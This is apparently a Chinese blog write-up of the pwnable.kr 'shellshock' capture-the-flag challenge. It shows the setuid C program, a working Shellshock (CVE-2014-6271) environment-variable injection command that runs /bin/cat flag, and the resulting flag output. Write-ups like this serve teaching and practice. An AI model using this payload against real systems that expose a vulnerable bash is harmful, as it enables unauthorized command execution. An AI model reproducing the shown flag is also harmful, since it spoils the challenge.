Pwnable.kr shellshock

这道题比较简单,对”破壳”漏洞了解的同学都能做出来。

#include <stdio.h>                                                
int main(){                                                       
        setresuid(getegid(), getegid(), getegid());               
        setresgid(getegid(), getegid(), getegid());               
        system("/home/shellshock/bash -c 'echo shock_me'");       
        return 0;                                                 
}                                                                 

源码中调用了题目提供的有漏洞的bash,我们可以构造如下命令来打印出flag:

    env x='() { :;}; /bin/cat flag' ./shellshock

上面这条命令相当于直接使用shellshcok调用的bash直接执行了/bin/cat flag,

shellshock@ubuntu:~$ env x='() { :;}; /bin/cat flag' ./shellshock    
only if I knew CVE-2014-6271 ten years ago..!!                       
Segmentation fault                                                   

先了解这个漏洞的同学可以看看这两篇文章

bash代码注入的安全漏洞
Shellshock漏洞回顾与分析测试

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
,